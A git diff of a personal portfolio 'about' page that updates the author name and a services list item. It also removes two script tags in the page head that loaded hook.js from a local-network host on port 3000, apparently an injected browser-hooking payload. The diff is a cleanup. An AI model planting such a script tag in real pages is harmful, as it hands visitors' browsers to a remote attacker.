--- a/about.html
+++ b/about.html
@@ -7,7 +7,7 @@
   <meta content="width=device-width,initial-scale=1" name="viewport">
   <meta content="description" name="description">
   <meta name="google" content="notranslate" />
-  <meta content="theterminalboy" name="author">
+  <meta content="Abdullah Al Tahir" name="author">
 
   <!-- Disable tap highlight on IE -->
   <meta name="msapplication-tap-highlight" content="no">
@@ -17,7 +17,8 @@
 
   <title>@aboutme</title>  
 
-<link href="./main.css" rel="stylesheet"><script src="http://192.168.1.49:3000/hook.js"></script><script src="http://192.168.1.49:3000/hook.js"></script></head>
+<link href="./main.css" rel="stylesheet">
+</head>
 
 <body class="">
 <div id="site-border-left"></div>
@@ -71,7 +72,7 @@
 				  <h3>Services</h3>
                   <ol>
                 <li>Systems analysis</li>
-                <li>Bug bounty</li>
+                <li>Bug hunter</li>
                 <li>Penetration test</li>
               </ol>
 				<p><a href="./works.html" class="btn btn-default">Services</a></p>  
